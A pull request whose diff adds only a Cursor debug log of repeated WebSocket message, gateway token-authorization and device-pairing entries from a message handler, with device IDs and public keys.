### PR TITLE
Confirmaciones para equipo de IT

### DIFF
--- a/.cursor/debug.log
+++ b/.cursor/debug.log
@@ -1,0 +1,174 @@
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215939555,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215939561,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:735","message":"Check pairing","data":{"deviceId":"b98d8e81ce251e290e9c82fab5f2b31994ee42f616c9e221e8b3d6a6c054c130","devicePublicKey":"leed52bE3YPWZxWttXFhIE1W72tLdpQk4hl0r5bEIBU"},"timestamp":1770215939571,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:737","message":"Pairing result","data":{"isPaired":true,"pairedPublicKey":"leed52bE3YPWZxWttXFhIE1W72tLdpQk4hl0r5bEIBU"},"timestamp":1770215939571,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215940154,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215940155,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:735","message":"Check pairing","data":{"deviceId":"b98d8e81ce251e290e9c82fab5f2b31994ee42f616c9e221e8b3d6a6c054c130","devicePublicKey":"leed52bE3YPWZxWttXFhIE1W72tLdpQk4hl0r5bEIBU"},"timestamp":1770215940157,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:737","message":"Pairing result","data":{"isPaired":true,"pairedPublicKey":"leed52bE3YPWZxWttXFhIE1W72tLdpQk4hl0r5bEIBU"},"timestamp":1770215940158,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215941449,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215941450,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215949555,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215949555,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215956459,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215956460,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215965556,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215965557,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215971482,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215971483,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215981556,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215981557,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215986499,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215986500,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770215997550,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770215997551,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216001517,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216001518,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216013556,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216013557,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216016532,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216016532,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216029570,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216029571,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216031553,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216031554,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216045555,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216045556,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216046569,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216046570,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216061556,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216061557,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216061574,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216061577,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216076597,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216076597,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216077551,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216077551,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216091643,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216091645,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216093558,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216093558,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216106681,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216106683,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216109562,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216109562,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216121704,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216121705,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216125580,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216125582,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216136746,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216136747,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216141608,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216141611,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216151782,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216151783,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216157561,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216157561,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216166795,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216166796,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216173564,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216173565,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216181810,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216181810,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216189553,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216189554,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216196817,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216196818,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216205556,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216205556,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216211845,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216211846,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216221560,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216221561,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216222717,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216222717,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:735","message":"Check pairing","data":{"deviceId":"4d5d17efe759f0fb1c5350371c7e40a8cec159a98a2f80dbe1d5709f60045e1c","devicePublicKey":"6akgsFx-480llmSqd7cC9TkwuwzkH1Zascga37hQEws"},"timestamp":1770216222719,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:737","message":"Pairing result","data":{"isPaired":true,"pairedPublicKey":"6akgsFx-480llmSqd7cC9TkwuwzkH1Zascga37hQEws"},"timestamp":1770216222719,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216226864,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216226865,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216237558,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216237558,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216241021,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216241021,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:735","message":"Check pairing","data":{"deviceId":"4d5d17efe759f0fb1c5350371c7e40a8cec159a98a2f80dbe1d5709f60045e1c","devicePublicKey":"6akgsFx-480llmSqd7cC9TkwuwzkH1Zascga37hQEws"},"timestamp":1770216241022,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:737","message":"Pairing result","data":{"isPaired":true,"pairedPublicKey":"6akgsFx-480llmSqd7cC9TkwuwzkH1Zascga37hQEws"},"timestamp":1770216241023,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216241877,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216241877,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216245765,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216245766,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:735","message":"Check pairing","data":{"deviceId":"4d5d17efe759f0fb1c5350371c7e40a8cec159a98a2f80dbe1d5709f60045e1c","devicePublicKey":"6akgsFx-480llmSqd7cC9TkwuwzkH1Zascga37hQEws"},"timestamp":1770216245767,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:737","message":"Pairing result","data":{"isPaired":true,"pairedPublicKey":"6akgsFx-480llmSqd7cC9TkwuwzkH1Zascga37hQEws"},"timestamp":1770216245768,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216253556,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216253557,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216256894,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216256895,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216269566,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216269567,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216271904,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216271904,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216285567,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216285569,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216286913,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216286914,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216301558,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216301558,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216301929,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216301929,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216316938,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216316939,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216317552,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216317553,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216331964,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216331965,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216333558,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216333558,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216346995,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216346997,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216349558,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216349558,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216362012,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216362013,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216365558,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216365558,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216377022,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216377022,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216381560,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216381561,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216392050,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216392051,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216397566,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216397566,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216407074,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216407075,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216413558,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216413558,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216422086,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216422087,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216429557,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216429558,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216437101,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216437102,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216445556,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216445556,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216452118,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216452119,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216461562,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216461563,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216467127,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216467128,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216472550,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216472554,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:735","message":"Check pairing","data":{"deviceId":"b98d8e81ce251e290e9c82fab5f2b31994ee42f616c9e221e8b3d6a6c054c130","devicePublicKey":"leed52bE3YPWZxWttXFhIE1W72tLdpQk4hl0r5bEIBU"},"timestamp":1770216472555,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:737","message":"Pairing result","data":{"isPaired":true,"pairedPublicKey":"leed52bE3YPWZxWttXFhIE1W72tLdpQk4hl0r5bEIBU"},"timestamp":1770216472555,"sessionId":"debug-session","hypothesisId":"C"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216477557,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216477557,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216482136,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216482138,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216493556,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216493557,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216497146,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216497146,"sessionId":"debug-session","hypothesisId":"B"}
